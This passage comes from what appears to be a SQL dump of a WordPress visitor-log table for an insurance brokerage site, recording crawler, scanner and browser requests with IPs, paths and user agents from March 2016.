)','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1223,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238856','107.170.94.61','107.170.94.61','/forms/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1225,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238867','107.170.94.61','107.170.94.61','/contact/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1228,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238877','107.170.94.61','107.170.94.61','/carriers/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1231,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238888','107.170.94.61','107.170.94.61','/about-us/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1234,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238900','107.170.94.61','107.170.94.61','/register/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1235,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238911','107.170.94.61','107.170.94.61','/insentives/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1238,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238922','107.170.94.61','107.170.94.61','/case-status/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1241,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238932','107.170.94.61','107.170.94.61','/agent-tools/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1243,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238943','107.170.94.61','107.170.94.61','/?page_id=169','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(1244,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238954','107.170.94.61','107.170.94.61','/term-quotes/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1247,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238964','107.170.94.61','107.170.94.61','/licensing-contracting/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1250,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238975','107.170.94.61','107.170.94.61','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(1253,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238986','107.170.94.61','107.170.94.61','/members/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'','','us','','','spbot','','','','3','0',0),(1255,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457238997','107.170.94.61','107.170.94.61','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/','',0,'','','us','','','spbot','','','','3','0',0),(1256,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457239007','107.170.94.61','107.170.94.61','/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/meet-the-eib-team/','',0,'','','us','','','spbot','','','','3','0',0),(1258,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457239018','107.170.94.61','107.170.94.61','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1261,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457239029','107.170.94.61','107.170.94.61','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1262,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457239039','107.170.94.61','107.170.94.61','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1264,'0b_aa39c8d35c73dae03bd0c1190022bf9b','1457239050','107.170.94.61','107.170.94.61','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(1267,'0b_6efd575e6c8c6771e745a4895ed793e8','1457240873','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1268,'0b_57fe0c66b2e94db3c91ab34af47de590','1457246753','108.185.223.7','cpe-108-185-223-7.socal.res.rr.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36','https://www.google.com','_notprovided_',1,'Win8','Chrome 31','','','www.google.com','','','','','0','0',0),(1270,'0b_57fe0c66b2e94db3c91ab34af47de590','1457246753','108.185.223.7','cpe-108-185-223-7.socal.res.rr.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36','https://www.google.com','_notprovided_',1,'Win8','Chrome 31','','','www.google.com','','','','','0','0',0),(1273,'0b_5a53a72dcb6d96fea6a1cf99dfb4b65b','1457247436','157.55.39.241','msnbot-157-55-39-241.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1274,'0b_f04d4ddafa620187ad526c8bad1e20cd','1457247657','66.249.73.187','crawl-66-249-73-187.googlebot.com','/paramed.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1276,'0b_40cd90e6ac9f71ae86a3f2339a50813e','1457252334','207.46.13.10','msnbot-207-46-13-10.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1279,'0b_58952ddba0f93fe9519aaf9f6e5eb3bc','1457252518','66.249.73.189','crawl-66-249-73-189.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1280,'0b_58952ddba0f93fe9519aaf9f6e5eb3bc','1457252545','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1283,'0b_a77614d8b8047435fbafd21cc3b71d48','1457253453','180.76.15.135','baiduspider-180-76-15-135.crawl.baidu.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(1286,'0b_9242106e0c03dca0da9ca8da5dfbac97','1457254939','157.55.39.241','msnbot-157-55-39-241.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1288,'0b_99f4027758c2065056b9d3a6a2719d57','1457259779','65.123.142.184','65.123.142.184','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.149 Safari/537.36','','',0,'Win7','Chrome 33','','','','','','','','0','0',0),(1291,'0b_fc24aceddd14886e45dc030b0d5cc7cb','1457260149','92.113.43.34','34-43-113-92.pool.ukrtel.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36','','',0,'Linux','Chrome 28','us','','','','','','','0','0',0),(1294,'0b_656be80fccd140a3615dc43acdbae66e','1457260157','92.113.43.34','34-43-113-92.pool.ukrtel.net','/','curl/7.35.0','','',0,'','','','','','cURL','','','','0','0',0),(1295,'0b_465ee62262bb922dd4babf71a6bd170e','1457263107','220.181.108.96','baiduspider-220-181-108-96.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(1297,'0b_0a455b876a9075332c3c0eac2e608d16','1457263109','220.181.108.176','baiduspider-220-181-108-176.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(1300,'0b_3cd8e2d69a5ca0f57150c1c7bcff1cc3','1457266214','188.165.234.68','crawl03.lp.007ac9.net','/robots.txt','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(1301,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266216','188.165.234.68','crawl03.lp.007ac9.net','/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1304,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266219','188.165.234.68','crawl03.lp.007ac9.net','/agent-tools/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1307,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266222','188.165.234.68','crawl03.lp.007ac9.net','/register/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1309,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266225','188.165.234.68','crawl03.lp.007ac9.net','/about-us/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1310,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266228','188.165.234.68','crawl03.lp.007ac9.net','/insentives/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1312,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266230','188.165.234.68','crawl03.lp.007ac9.net','/licensing-contracting/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1313,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266233','188.165.234.68','crawl03.lp.007ac9.net','/carriers/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1316,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266236','188.165.234.68','crawl03.lp.007ac9.net','/contact/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1319,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266239','188.165.234.68','crawl03.lp.007ac9.net','/case-status/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1322,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266241','188.165.234.68','crawl03.lp.007ac9.net','/forms/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1325,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266247','188.165.234.68','crawl03.lp.007ac9.net','/igo/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1327,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266250','188.165.234.68','crawl03.lp.007ac9.net','/term-quotes/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1328,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266252','188.165.234.68','crawl03.lp.007ac9.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1330,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266255','188.165.234.68','crawl03.lp.007ac9.net','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1333,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266258','188.165.234.68','crawl03.lp.007ac9.net','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1336,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266261','188.165.234.68','crawl03.lp.007ac9.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1339,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266263','188.165.234.68','crawl03.lp.007ac9.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1342,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266266','188.165.234.68','crawl03.lp.007ac9.net','/?page_id=169','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1345,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266269','188.165.234.68','crawl03.lp.007ac9.net','/about-us/meet-the-eib-team/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1346,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266272','188.165.234.68','crawl03.lp.007ac9.net','/members/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1349,'0b_fcb3f296f571fdf326ae30a2935d48ba','1457266274','188.165.234.68','crawl03.lp.007ac9.net','/meet-the-eib-team/','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2','','',0,'Linux','Chrome 5','us','','','Unknown Spider','','','','3','0',0),(1352,'0b_45c983bdc98cd74e901980207a55c1e5','1457266708','66.249.73.178','crawl-66-249-73-178.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1355,'0b_45c983bdc98cd74e901980207a55c1e5','1457266711','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(1358,'0b_a46bf9f1da699770e654d53cb3b9d6c3','1457268248','207.46.13.10','msnbot-207-46-13-10.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1361,'0b_aba4c057d8abf9c1553218bca9d3b410','1457270545','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1364,'0b_756295ec45f0a66a42f2b65bb9fdad46','1457273718','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1367,'0b_756295ec45f0a66a42f2b65bb9fdad46','1457273809','66.249.73.178','crawl-66-249-73-178.googlebot.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1369,'0b_20ab2b01a55151bb30dd64a8c617afb4','1457274114','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1370,'0b_15f41e1deb1e50967a39e917eb8248b7','1457275981','54.84.244.52','ec2-54-84-244-52.compute-1.amazonaws.com','/robots.txt','btcrawler','','',0,'','','','','','Unknown Spider','','','','0','0',0),(1373,'0b_15f41e1deb1e50967a39e917eb8248b7','1457275982','54.84.244.52','ec2-54-84-244-52.compute-1.amazonaws.com','/','btcrawler','','',0,'','','us','','','','','','','0','0',0),(1375,'0b_da78299bc7ef49222c75b9e91bab8eee','1457278162','89.163.148.58','ju058.jupiter.fastwebserver.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1376,'0b_da78299bc7ef49222c75b9e91bab8eee','1457278164','89.163.148.58','ju058.jupiter.fastwebserver.de','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1378,'0b_da78299bc7ef49222c75b9e91bab8eee','1457278165','89.163.148.58','ju058.jupiter.fastwebserver.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1379,'0b_da78299bc7ef49222c75b9e91bab8eee','1457278167','89.163.148.58','ju058.jupiter.fastwebserver.de','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1382,'0b_da78299bc7ef49222c75b9e91bab8eee','1457278170','89.163.148.58','ju058.jupiter.fastwebserver.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1385,'0b_da78299bc7ef49222c75b9e91bab8eee','1457278173','89.163.148.58','ju058.jupiter.fastwebserver.de','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1387,'0b_da78299bc7ef49222c75b9e91bab8eee','1457278176','89.163.148.58','ju058.jupiter.fastwebserver.de','/products.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(1390,'0b_8350ca04607de3cb7af747620ee19b28','1457278291','66.249.73.178','crawl-66-249-73-178.googlebot.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(1393,'0b_8fb7ffcdb67df32f9050ac10163e4281','1457278357','180.76.15.157','baiduspider-180-76-15-157.crawl.baidu.com','/licensing-contracting/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(1396,'0b_8350ca04607de3cb7af747620ee19b28','1457279156','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1397,'0b_8350ca04607de3cb7af747620ee19b28','1457279800','66.249.73.187','crawl-66-249-73-187.googlebot.com','/term-quotes/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1399,'0b_9d4254eccb5dc1c695aae7be0bd61e77','1457279934','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1402,'0b_5ed01ff0cbc9f01542b2f8eecf19d55d','1457280000','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1405,'0b_796690a3b63fd947f591064f5ded048b','1457280222','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1406,'0b_796690a3b63fd947f591064f5ded048b','1457280224','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1409,'0b_796690a3b63fd947f591064f5ded048b','1457280226','184.154.139.23','placeholder.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1412,'0b_796690a3b63fd947f591064f5ded048b','1457280228','184.154.139.23','placeholder.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1414,'0b_796690a3b63fd947f591064f5ded048b','1457280230','184.154.139.23','placeholder.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1415,'0b_796690a3b63fd947f591064f5ded048b','1457280232','184.154.139.23','placeholder.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1417,'0b_796690a3b63fd947f591064f5ded048b','1457280234','184.154.139.23','placeholder.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1420,'0b_796690a3b63fd947f591064f5ded048b','1457280236','184.154.139.23','placeholder.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1423,'0b_796690a3b63fd947f591064f5ded048b','1457280238','184.154.139.23','placeholder.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1424,'0b_e47f29445ee6eef85671bd82fa363925','1457280241','184.154.139.23','placeholder.sitelock.com','/?page_id=169','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(1427,'0b_796690a3b63fd947f591064f5ded048b','1457280242','184.154.139.23','placeholder.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(1429,'0b_1c1ccf9645de04a8e03cd63f0bade882','1457280894','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1432,'0b_9a47462b371594d42bea6922b114ac0a','1457281328','66.249.73.202','crawl-66-249-73-202.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1433,'0b_aa02cd6d7805ec24750bd41f17751b01','1457281396','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1435,'0b_5b5f400e0738d7cd55ef2a4e78a9a514','1457282380','180.76.15.158','baiduspider-180-76-15-158.crawl.baidu.com','/case-status/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(1438,'0b_0ed3685b504638c70e0ac89406c9a201','1457282419','173.208.130.67','173.208.130.67','/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko/20100101 Firefox/12.0','','',0,'Win10 x64','Firefox 12','us','','','','','','','0','0',0),(1441,'0b_a87c9f34e6bd62a9aadc0ae362c6557d','1457286946','66.249.83.246,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google Favicon','','',0,'Win7','Firefox 6','','','','','','','','0','0',0),(1444,'0b_9a2ae7c2911cb6184bd32e7171e93d0a','1457288191','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1447,'0b_b479939986ea60f6f9ffddad2d854cd1','1457289475','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; 